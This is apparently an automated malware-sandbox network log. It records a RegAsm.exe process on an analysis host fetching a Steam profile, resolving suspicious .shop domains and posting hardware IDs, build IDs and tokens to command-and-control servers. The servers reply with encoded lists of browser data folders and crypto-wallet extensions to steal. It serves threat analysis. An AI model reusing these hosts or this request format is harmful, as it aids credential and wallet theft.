Sep 26, 2024 20:14:23.221576929 CEST	53	64022	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:00.524147034 CEST	57738	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:00.653294086 CEST	53	57738	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:03.681282997 CEST	50647	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:03.700030088 CEST	53	50647	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:04.677174091 CEST	57503	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:04.694371939 CEST	53	57503	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:06.785777092 CEST	61063	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:06.800405025 CEST	53	61063	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:07.796963930 CEST	60331	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:07.812350035 CEST	53	60331	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:08.854602098 CEST	53384	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:08.867413044 CEST	53	53384	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:10.632491112 CEST	63469	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:10.647519112 CEST	53	63469	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:11.551526070 CEST	59778	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:11.563410997 CEST	53	59778	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:11.608916998 CEST	65058	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:11.624574900 CEST	53	65058	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:12.658468008 CEST	60357	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:12.671858072 CEST	53	60357	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:13.640455008 CEST	55767	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:13.647470951 CEST	53	55767	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:14.914947987 CEST	58370	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:14.934187889 CEST	53	58370	1.1.1.1	192.168.2.5
Sep 26, 2024 20:15:37.661142111 CEST	57771	53	192.168.2.5	1.1.1.1
Sep 26, 2024 20:15:37.669563055 CEST	53	57771	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 20:14:23.214566946 CEST	192.168.2.5	1.1.1.1	0x6653	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:00.524147034 CEST	192.168.2.5	1.1.1.1	0x5641	Standard query (0)	dbsmena.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:03.681282997 CEST	192.168.2.5	1.1.1.1	0x57a3	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:04.677174091 CEST	192.168.2.5	1.1.1.1	0xc38	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:06.785777092 CEST	192.168.2.5	1.1.1.1	0xb9e7	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:07.796963930 CEST	192.168.2.5	1.1.1.1	0xc1ed	Standard query (0)	vozmeatillu.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:08.854602098 CEST	192.168.2.5	1.1.1.1	0xef67	Standard query (0)	drawzhotdog.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:10.632491112 CEST	192.168.2.5	1.1.1.1	0xfb37	Standard query (0)	fragnantbui.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:11.551526070 CEST	192.168.2.5	1.1.1.1	0x17d7	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:11.608916998 CEST	192.168.2.5	1.1.1.1	0xfed1	Standard query (0)	stogeneratmns.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:12.658468008 CEST	192.168.2.5	1.1.1.1	0x474b	Standard query (0)	reinforcenh.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:13.640455008 CEST	192.168.2.5	1.1.1.1	0xefa7	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:14.914947987 CEST	192.168.2.5	1.1.1.1	0xfb8f	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:37.661142111 CEST	192.168.2.5	1.1.1.1	0x8482	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 20:14:23.221576929 CEST	1.1.1.1	192.168.2.5	0x6653	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:00.653294086 CEST	1.1.1.1	192.168.2.5	0x5641	No error (0)	dbsmena.com	172.105.54.160	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:03.700030088 CEST	1.1.1.1	192.168.2.5	0x57a3	No error (0)	ghostreedmnu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:03.700030088 CEST	1.1.1.1	192.168.2.5	0x57a3	No error (0)	ghostreedmnu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:04.694371939 CEST	1.1.1.1	192.168.2.5	0xc38	No error (0)	gutterydhowi.shop	172.67.132.32	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:04.694371939 CEST	1.1.1.1	192.168.2.5	0xc38	No error (0)	gutterydhowi.shop	104.21.4.136	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:06.800405025 CEST	1.1.1.1	192.168.2.5	0xb9e7	No error (0)	offensivedzvju.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:06.800405025 CEST	1.1.1.1	192.168.2.5	0xb9e7	No error (0)	offensivedzvju.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:07.812350035 CEST	1.1.1.1	192.168.2.5	0xc1ed	No error (0)	vozmeatillu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:07.812350035 CEST	1.1.1.1	192.168.2.5	0xc1ed	No error (0)	vozmeatillu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:08.867413044 CEST	1.1.1.1	192.168.2.5	0xef67	No error (0)	drawzhotdog.shop	172.67.162.108	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:08.867413044 CEST	1.1.1.1	192.168.2.5	0xef67	No error (0)	drawzhotdog.shop	104.21.58.182	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:10.647519112 CEST	1.1.1.1	192.168.2.5	0xfb37	No error (0)	fragnantbui.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:10.647519112 CEST	1.1.1.1	192.168.2.5	0xfb37	No error (0)	fragnantbui.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:11.563410997 CEST	1.1.1.1	192.168.2.5	0x17d7	No error (0)	cowod.hopto.org	45.132.206.251	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:11.624574900 CEST	1.1.1.1	192.168.2.5	0xfed1	No error (0)	stogeneratmns.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:11.624574900 CEST	1.1.1.1	192.168.2.5	0xfed1	No error (0)	stogeneratmns.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:12.671858072 CEST	1.1.1.1	192.168.2.5	0x474b	No error (0)	reinforcenh.shop	172.67.208.139	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:12.671858072 CEST	1.1.1.1	192.168.2.5	0x474b	No error (0)	reinforcenh.shop	104.21.77.130	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:13.647470951 CEST	1.1.1.1	192.168.2.5	0xefa7	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:14.934187889 CEST	1.1.1.1	192.168.2.5	0xfb8f	No error (0)	ballotnwu.site	104.21.2.13	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:14.934187889 CEST	1.1.1.1	192.168.2.5	0xfb8f	No error (0)	ballotnwu.site	172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 26, 2024 20:15:37.669563055 CEST	1.1.1.1	192.168.2.5	0x8482	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

5.75.211.162

dbsmena.com

ghostreedmnu.shop

gutterydhowi.shop

offensivedzvju.shop

vozmeatillu.shop

drawzhotdog.shop

fragnantbui.shop

stogeneratmns.shop

reinforcenh.shop

ballotnwu.site

cowod.hopto.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49751	45.132.206.251	80	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 20:15:11.570560932 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGHCBGCBFHIIDHIJKFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 3209 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 20:15:11.570601940 CEST	3209	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 Data Ascii: ------ECGHCBGCBFHIIDHIJKFBContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------ECGHCBGCBFHIIDHIJKFBContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------ECGHCBGCBFHIID
Sep 26, 2024 20:15:12.352721930 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 18:15:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49715	104.102.49.254	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:24 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:24 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 18:14:24 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=ca886ad16a82175015e6d976; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 18:14:24 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 18:14:24 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 18:14:24 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 18:14:24 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49716	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:25 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49717	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:26 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:26 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 31 43 43 39 30 31 44 30 42 41 31 39 30 34 36 36 35 39 35 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 2d 2d 0d Data Ascii: ------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="hwid"691CC901D0BA1904665954-a33c7340-61ca------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------FCFBFHIEBKJKFHIEBFBA--
2024-09-26 18:14:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:27 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|355b3447d7bcbbc2e897f0d2d0242908\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49718	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:28 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:28 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------HIDGCFBFBFBKEBGCAFCGCont
2024-09-26 18:14:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:28 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49719	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:29 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:29 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------DBAAFIDGDAAAAAAAAKEBCont
2024-09-26 18:14:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:30 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:30 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
